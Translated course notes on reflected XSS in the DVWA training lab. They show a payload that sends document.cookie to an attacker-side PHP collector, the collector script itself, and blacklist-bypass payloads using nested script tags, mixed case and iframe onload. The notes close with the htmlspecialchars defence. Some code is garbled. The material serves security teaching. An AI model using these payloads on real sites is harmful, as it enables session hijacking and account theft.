"Notes" NetEase micro-professional-web security Engineer -04.web Security Combat -9.XSS

XSS: Cross site script attack, which we mentioned earlier, refers to an attacker entering (passing in) malicious HTML code into a Web site with an XSS vulnerability, and this HTML code executes automatically when other users browse the site. So as to achieve the purpose of the attack. For example, theft of user cookies, destruction of page structure, redirection to other websites, etc. In theory, there is an XSS vulnerability in which all input data is not processed.

The following is an approximate flow of reflective XSS:

We will be in the actual combat to understand the process.

DVWA Combat:

1. Open Phpstudy or XAMPP, run Apach and MySQL;

2. The browser enters DVWA main interface, select DVWA security Level low in the left column, then enter XSS (reflected).

When we enter the name Kplayer, the page returns the welcome message Hello Kplayer. If we enter a JS script:

<script>alert (/xss/) </script>

A successful popup window is found, and there is an XSS vulnerability. But some people will say, there will be such a silly person? Enter the script box for yourself in the input box? Of course not! If the attacker sends a link to the victim:

http://localhost/DVWA-1.9/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E#

If the attacker clicks, the attacker's browser pops up. Wait, this operation seems a bit familiar, we are in the CSRF that section is also like this pattern, what is the difference?

CSRF: cross-site request forgery, is the use of a cookie or session impersonating a user to the server to initiate a request to complete the attack (such as money transfer, etc.), because the server too much trust user identity!

Reflective XSS: cross-site request attack because the user trusts the current link or website too much! and the link or page is injected into the JS script, once it is allowed to execute, it is not only play a prank window, you may get the user's cookie information, and then malicious operations.

For example, an attacker constructs a cookie.php file that reads as follows:

<? PHP $cookie $_get　　[' Cookie '];  file_put_contents(' Cookie.txt ',$cookie);? >

Place the attacker's server directory and send a malicious link to the victim:

Http://localhost/DVWA-1.9/vulnerabilities/xss_r/?name=<script>document.location= ' HTTP://127.0.0.1/ Cookie.php?cookie= ' +document.cookie;</script>#

You need to convert to a URL link using Hackbar:

http://localhost/DVWA-1.9/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%27http%3A%2f% 2f127.0.0.1%2fcookie.php%3fcookie%3d%27%2bdocument.cookie%3b</script>#

Then we see that the cookie.txt under the attacker's server has loaded the user's cookie:

3. Next we look at the medium level of reflective XSS, found that the above method is invalid, view the background source code, we found that the keyword is filtered, essentially a blacklist mechanism.

    // Get Input    $name Str_replace $_get [' name ']);

After the previous temper, we are not afraid of the blacklist, but the heart of the happy, because the use of blacklists means that may be able to bypass, such as the use of nested notation <scr<script>ipt> or case mix < Script>, don't dwell on it.

4. Let's take a look at the high level of reflective XSS and find that it's also a blacklist-filtered way to confuse nested notation with case-insensitive bypass:

$name Preg_replace $_get [' name ']);

This limits our use of script scripts, but as long as it is blacklisted, there can be flaws, and we can use other tags such as img and IFRAME tags:

<iframe Onload=alert (1);>

5. Finally take a look at the impossible level of reflective XSS, found that it uses the Htmlspecialchars function to the pre-defined characters &, ",", <, > converted to HTML entities, to prevent the browser as HTML elements, Anti-reflective XSS attack is effective.

    // Get Input    $name Htmlspecialchars $_get [' name ']);

6. DVWA also has the storage type XSS actual combat, actually and the reflection type XSS practice is similar, here does not repeat the narration, the interested classmate just can go to the experiment.

Practical experience:

XSS (Cross site Scripting), an inter-site scripting attack, is a script injection attack that allows an attacker to execute malicious code scripts in another user's browser, and effective protection is to filter output and input efficiently, such as HTML encoding, JS escaping, and so on.

"Notes" NetEase micro-professional-web security Engineer -04.web Security Combat -9.XSS